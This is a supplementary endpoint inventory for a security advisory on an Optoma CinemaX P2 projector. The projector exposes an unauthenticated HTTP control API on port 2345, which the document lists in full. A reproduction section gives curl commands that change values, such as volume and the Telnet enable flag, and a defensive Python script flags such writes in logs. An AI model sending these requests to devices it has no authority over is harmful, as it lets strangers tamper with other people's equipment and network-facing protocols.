Supplementary inventory for the security advisory at /security/2026-02-01-smart-projector/ — full list of HTTP API endpoints exposed by MCentralmanager.apk (com.coretronic.demo.server) on TCP port 2345 of the Optoma CinemaX P2 (firmware TVOS-04.24.010.04.01), tracked under CVE-2026-30496 (CVSS 6.3 Medium).
All endpoints are accessible without authentication to any device on the same Layer 2 network. The list below is from a single CinemaX P2 (model X1VDPTHG); values are example readings from that device, not a specification.
API Behaviour
URL pattern: http://<ip>:2345/<behavior>/<action>
| Method | Behavior | URL pattern | Function |
|---|---|---|---|
| GET | get | /get/<action> | Read integer value |
| GET | get_s | /get_s/<action> | Read string value |
| GET | inc | /inc/<action> | Increment integer value |
| GET | dec | /dec/<action> | Decrement integer value |
| PUT | set | /set/<action>?value=X | Set integer value |
| PUT | set_s | /set_s/<action>?value=X | Set string value |
| PUT | action | /action/<action> | Trigger action |
There is no per-action authorisation; every action enum value reachable via /get/ is also writable via /set/. Confirmed during disclosure testing for Volume, Mute, and TelnetOn (the latter as a representative protocol-enable flag).
Endpoints
74 distinct actions enumerated. Sample values shown are what one device reported; they are not defaults and will vary between installations.
Display & image (14)
| Endpoint | Sample value |
|---|---|
| Brightness | -9 |
| Contrast | 10 |
| Color | 6 |
| Sharpness | 10 |
| Gamma | 0 |
| AspectRatio | 0 |
| DisplayMode | 0 |
| BrightnessMode | 12 |
| BrilliantColor | 10 |
| ColorTemperature | 1 |
| ColorSpace | 0 |
| Tint | 0 |
| ProjectionMode | 2 |
| PureMotion | 0 |
Keystone, geometry, cursor & grid (9)
| Endpoint | Sample value |
|---|---|
| HKeystone | 0 |
| VKeystone | 0 |
| GeometricWarpControl | 1 |
| GeometricWarpInner | 0 |
| GeometricWarpMovement | 2 |
| GeometricWarpCursorColor | 2 |
| GeometricBackgroundColor | 0 |
| GeometricCursorPoints | 1 |
| GeometricGridColor | 1 |
Audio (8)
| Endpoint | Sample value |
|---|---|
| Volume | 93 |
| Mute | 0 |
| AudioOut | 0 |
| InternalSpeaker | 0 |
| SoundEffect | 0 |
| SPDIF | 2 |
| SpeakerDelay | 0 |
| DigitalOutputDelay | 0 |
Input source & signal (8)
| Endpoint | Sample value |
|---|---|
| CurrentInputSource | 4 |
| AutoSource | 1 |
| SignalPowerOn | 0 |
| SignalFrequency | 0 |
| SignalHPosition | 0 |
| SignalVPosition | 0 |
| SignalPhase | 0 |
| EDIDReminder | 0 |
Power management (6)
| Endpoint | Sample value |
|---|---|
| DirectPowerOn | 1 |
| PowerModeStandby | 1 |
| PowerOffLink | 1 |
| PowerOnLink | 1 |
| AutoPowerOffMin | 20 |
| SleepTimerMin | 0 |
Network & control protocols (8)
These flags advertise the device's exposed control surface and are writable. An attacker with access to port 2345 can flip any of them without authentication.
| Endpoint | Sample value |
|---|---|
| HTTPOn | 1 |
| TelnetOn | 1 |
| PJLinkOn | 1 |
| CrestronOn | 1 |
| ExtronOn | 1 |
| AMXDeviceDiscoveryOn | 1 |
| LANDHCP | 0 |
| WLANWiFiOn | 1 |
Lamp & filter (7)
| Endpoint | Sample value |
|---|---|
| LampHoursTotal | 0 |
| LampHoursBright | 0 |
| LampHoursDynamic | 0 |
| LampHoursEco | 0 |
| LampReminder | 0 |
| FilterUsageHour | 0 |
| FilterReminder | 0 |
HDR (3)
| Endpoint | Sample value |
|---|---|
| DynamicRangeHDR | 0 |
| DynamicRangeHDRPictureMode | 2 |
| HLGPictureMode | 1 |
Sensors (2)
| Endpoint | Sample value |
|---|---|
| ProximitySensor | 1 |
| HighAltitude | 0 |
Colour calibration (6)
| Endpoint | Sample value |
|---|---|
| RedGain | 0 |
| GreenGain | 0 |
| BlueGain | 0 |
| RedBias | 0 |
| GreenBias | 0 |
| BlueBias | 0 |
Identification & UI (3)
| Endpoint | Sample value |
|---|---|
| ProjectorID | 0 |
| MenuTimer | 2 |
| FrameDelay | 1 |
Reproduction
# Read any value (no authentication)
curl http://<projector-ip>:2345/get/Volume
# Write any value (no authentication)
curl -X PUT "http://<projector-ip>:2345/set/Volume?value=50"
# Toggle a control protocol flag without authentication
curl http://<projector-ip>:2345/get/TelnetOn
curl -X PUT "http://<projector-ip>:2345/set/TelnetOn?value=0"
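For defenders, the URL pattern and behaviour table above are enough to spot state-changing requests in captured HTTP traffic. The following is an added example, not part of the advisory or the vendor's code: it classifies requests by the behaviour segment of the path rather than by HTTP method, because inc and dec change values over GET, and it rates writes to the "Network & control protocols" flags higher. The log layout (`<timestamp> <src_ip> <METHOD> <url>`), the severity labels and the sample lines are assumptions constructed for illustration.

```python
import re

# Behaviours from the advisory's API table that change device state.
# inc/dec are GET requests, so filtering on PUT alone would miss them.
WRITE_BEHAVIOURS = {"inc", "dec", "set", "set_s", "action"}
# Actions listed under "Network & control protocols" in the inventory.
PROTOCOL_FLAGS = {"HTTPOn", "TelnetOn", "PJLinkOn", "CrestronOn", "ExtronOn",
                  "AMXDeviceDiscoveryOn", "LANDHCP", "WLANWiFiOn"}

# Assumed (hypothetical) log layout: "<timestamp> <src_ip> <METHOD> <url>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) "
    r"http://(?P<host>[^:/\s]+):2345/(?P<behaviour>[a-z_]+)/(?P<action>\w+)"
    r"(?:\?value=(?P<value>[^&\s]*))?")

def classify(line):
    """Return a finding dict for a state-changing request, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m["behaviour"] not in WRITE_BEHAVIOURS:
        return None
    # Severity labels are this example's own choice, not the advisory's.
    severity = "high" if m["action"] in PROTOCOL_FLAGS else "low"
    return {"ts": m["ts"], "src": m["src"], "target": m["host"],
            "method": m["method"], "behaviour": m["behaviour"],
            "action": m["action"], "value": m["value"], "severity": severity}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
2026-02-01T10:00:01Z 192.0.2.10 GET http://192.0.2.50:2345/get/Volume
2026-02-01T10:00:05Z 192.0.2.10 PUT http://192.0.2.50:2345/set/Volume?value=50
2026-02-01T10:00:09Z 192.0.2.23 GET http://192.0.2.50:2345/inc/Brightness
2026-02-01T10:00:12Z 192.0.2.23 PUT http://192.0.2.50:2345/set/TelnetOn?value=0
2026-02-01T10:00:15Z 192.0.2.23 GET http://192.0.2.50:8080/set/TelnetOn?value=1
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests to ports other than 2345, such as the last sample line, are ignored by design; adapt the pattern to whatever fields your proxy or flow logs actually record.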
See the main advisory for impact, vendor response, and remediation guidance.